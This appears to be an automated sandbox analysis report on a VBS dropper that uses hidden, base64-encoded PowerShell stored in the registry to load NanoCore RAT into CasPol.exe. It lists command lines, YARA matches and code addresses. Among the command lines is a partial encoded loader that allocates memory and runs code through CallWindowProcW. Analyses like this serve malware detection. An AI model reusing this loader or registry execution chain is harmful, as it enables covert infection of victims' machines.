QAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $Jordrefor=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').EPISCLERIT;powershell.exe -windowstyle hidden -encodedcommand($Jordrefor)
Potential malicious VBS script found (suspicious strings)
Source: Initial file: obj1.ShellExecute MyFile , INTENS ,"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", INTENS ,"","",0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7389
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7408
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7389 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7408
Yara signature match
Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1e1c3f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1e173f10.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1eeadc.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f19eadc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f1a3105.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1f3105.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f19eadc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 37.2.CasPol.exe.1f1e9ca6.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 34.2.CasPol.exe.1f199ca6.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 37.2.CasPol.exe.1f1eeadc.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000022.00000002.268467219270.000000001E151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000022.00000002.268467630247.000000001F151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000025.00000002.268476945395.000000001E1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000025.00000002.268477360466.000000001F1A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: powershell.exe PID: 6132, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6968, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7416, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: CasPol.exe PID: 3064, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CasPol.exe PID: 7664, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0376E958 10_2_0376E958
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0376E949 10_2_0376E949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E5AF0 10_2_081E5AF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081EAC80 10_2_081EAC80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E7380 10_2_081E7380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E9A70 10_2_081E9A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_081E7B20 10_2_081E7B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0823E050 10_2_0823E050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08233BE8 10_2_08233BE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0823BE98 10_2_0823BE98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08233BE8 10_2_08233BE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4BF0 10_2_088D4BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4FF0 10_2_088D4FF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D2227 10_2_088D2227
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D35B0 10_2_088D35B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D9928 10_2_088D9928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF380 10_2_088DF380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D4BF0 10_2_088D4BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D3258 10_2_088D3258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF380 10_2_088DF380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DF374 10_2_088DF374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088DD5E0 10_2_088DD5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B0968 10_2_089B0968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B2858 10_2_089B2858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089B284A 10_2_089B284A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EEE78 10_2_089EEE78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EAF08 10_2_089EAF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EC1F0 10_2_089EC1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089E0006 10_2_089E0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089E0040 10_2_089E0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_089EB198 10_2_089EB198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08AB8880 10_2_08AB8880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_088D9919 10_2_088D9919
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04AB8FB0 19_2_04AB8FB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04ABE828 19_2_04ABE828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_04ABE838 19_2_04ABE838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08010898 19_2_08010898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08011F00 19_2_08011F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08016D88 19_2_08016D88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08011F00 19_2_08011F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08010540 19_2_08010540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08150006 19_2_08150006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08150040 19_2_08150040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BC698 19_2_081BC698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_081BC688 19_2_081BC688
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845CD68 19_2_0845CD68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845C103 19_2_0845C103
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845E6DA 19_2_0845E6DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845D712 19_2_0845D712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0845F640 19_2_0845F640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_0856ECF0 19_2_0856ECF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08563360 19_2_08563360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08563332 19_2_08563332
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08955990 19_2_08955990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08955980 19_2_08955980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089501C8 19_2_089501C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08951680 19_2_08951680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089AD078 19_2_089AD078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089AD998 19_2_089AD998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_089A0040 19_2_089A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_08016D84 19_2_08016D84
Source: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\DSL Monitor\dslmon.exe Code function: 20_2_054F04B0 20_2_054F04B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B405C8 25_2_02B405C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B40040 25_2_02B40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436E0 25_2_02B436E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436D0 25_2_02B436D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B40608 25_2_02B40608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B436E0 25_2_02B436E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B41578 25_2_02B41578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B51D19 25_2_02B51D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_02B51D19 25_2_02B51D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04A7E960 25_2_04A7E960
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_04A7E951 25_2_04A7E951
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0795BE58 25_2_0795BE58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079524C8 25_2_079524C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0795DB18 25_2_0795DB18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_079571D8 25_2_079571D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0796CBA8 25_2_0796CBA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07962F98 25_2_07962F98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07961E58 25_2_07961E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_07962A41 25_2_07962A41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08100011 25_2_08100011
